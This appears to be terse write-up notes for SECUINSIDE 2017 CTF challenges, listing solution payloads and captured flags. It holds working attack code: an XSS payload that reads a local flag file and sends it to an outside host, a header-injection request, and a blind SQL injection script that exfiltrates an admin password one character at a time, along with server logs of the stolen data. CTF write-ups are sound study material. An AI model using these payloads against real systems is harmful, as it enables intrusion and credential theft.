source code
https://github.com/junorouse/secuinside2017-pwn1
https://github.com/junorouse/secuinside2017-web1
https://github.com/junorouse/secuinside2017-web-2
desc: caches are deleted every 3 minutes.
caching this file and load http/../cache/4b975377a178a70030f2a85daf497836.html
cache/4b975377a178a70030f2a85daf497836.html
<!DOCTYPE html><body><script src=http://code.jquery.com/jquery-3.2.1.min.js></script><script>$.ajax({url:"file:///flag",success:function(a){(new Image).src="http://junan.io/flag_"+a},async:!1}),console.log("A")</script>
52.78.36.198 - - [28/Jun/2017:21:12:01 -0400] "GET /flag_SECU[flag] HTTP/1.1" 404 152 "-" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1"
file:// <-> file:// (Same origin)
relative path without file protocol --> file://[relative path]
flag : SECU[In sl33p h3 s4ng t0 m3, in dr34m5 h3 c4m3]
flag: SECU[phantom_js_is_magicalllllll~!@~!]
from requests import get, post
headers = {
'Cookie': 'token=a6de6ffba2040055e3ba861aae1f9953012c48cc; user_id=junoim;'
}
data ={
'title': 'last\nAccess-Control-Allow-Origin: *\n',
'content': '''
<script src="//code.jquery.com/jquery-3.2.1.min.js"></script>
<script src="http://junan.io/exploit/exp.js"></script>
'''
}
c = post("http://pine-apple.kr/support.php", headers=headers, data=data)
print c.content
//http://52.78.46.132/read.php?idx_token=d83ef283f340426486f9befde2381d1c83fa40dd
function go(i, j) {
var token="9974370887355d2388f8044de58eac6db0ce50b2";
$.ajax({
type: 'get',
url: "http://localhost/admin/read.php?idx_token="+token+"%27%20%26%26%20(ascii(substr((select user_pw from users where user_id='admin'),"+j+",1)))="+i+"%23",
//url: 'http://localhost/admin/read.php?idx_token'
async: false,
success: function(data) {
var x = new Image();
x.src='http://junan.io/x_'+String.fromCharCode(i);
console.log(data);
},
error: function(err) {
// var x = new Image();
// x.src='http://junan.io/x_error';
}
});
}
var j=2; // bsqli index
for (i=32; i<127; i++) {
go(i, j);
}
origin: localhost != 127.0.0.1
flag : SECU[D0_U_L1K3_X55_C4LLS?]
caches are deleted every minutes.
reversing flag : SECU[I have gold medal in AcM ICPC]
pwnable flag : SECU[You pwned my k-vm system bb]